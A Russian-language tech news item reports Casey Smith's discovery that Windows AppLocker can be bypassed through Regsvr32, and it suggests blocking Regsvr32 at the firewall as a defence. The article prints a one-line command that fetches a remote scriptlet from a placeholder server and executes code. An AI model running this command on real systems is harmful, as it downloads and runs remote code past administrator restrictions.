На информационном ресурсе применяются рекомендательные технологии (информационные технологии предоставления информации на основе сбора, систематизации и анализа сведений, относящихся к предпочтениям пользователей сети "Интернет", находящихся на территории Российской Федерации)

Свежие комментарии

  • Алексей Демин
    ПриветВ России запустят...
  • Максим Гусев
    горшок для лука лучше бы сделал из видикаВторая жизнь виде...
  • Модест
    Лампочки мигают, дурачок радуется... Новый распил бюджета на космос?Что придет на зам...

Безопасность Windows оказалась под угрозой

Безопасность Windows оказалась под угрозой

В течение многих лет в бизнес-ориентированных версиях Windows присутствует функция AppLocker, которая позволяет администратору регулировать запуск тех или иных программ на компьютере. Например, можно запретить установку любых программ или запуск уже имеющихся приложений, которые не относятся к работе сотрудника. Это несомненно полезно для компаний, стремящихся защитить свою структуру от потенциально опасного ПО, однако исследователь Кейси Смит (Casey Smith) выяснил, что полностью доверять AppLocker не стоит, поскольку обнаруженная им уязвимость позволяет обходить ограничения администратора с помощью одной строки кода. Таким образом хакерам ничего не стоит взломать компьютеры и запустить вредоносное ПО.

Кейси Смит указал на инструмент Regsvr32, который можно использовать не по назначению для скачивания из интернета определенного XML-файла. Ввод команды вида regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll и скачивание файла, приведет к запуску cmd.exe, который можно заменить на любую другую программу, несмотря на установленные администратором ограничения в AppLocker. Атака не оставляет следов на жестком диске и в реестре, а в арсенале Microsoft пока не существует соответствующей «заплатки» для этой уязвимости. Описание ее Смит опубликовал на сервисе GitHub. Как вариант защиты рекомендуется отрезать Regsvr32 от интернета с помощью файервола.

Источник

Картина дня

наверх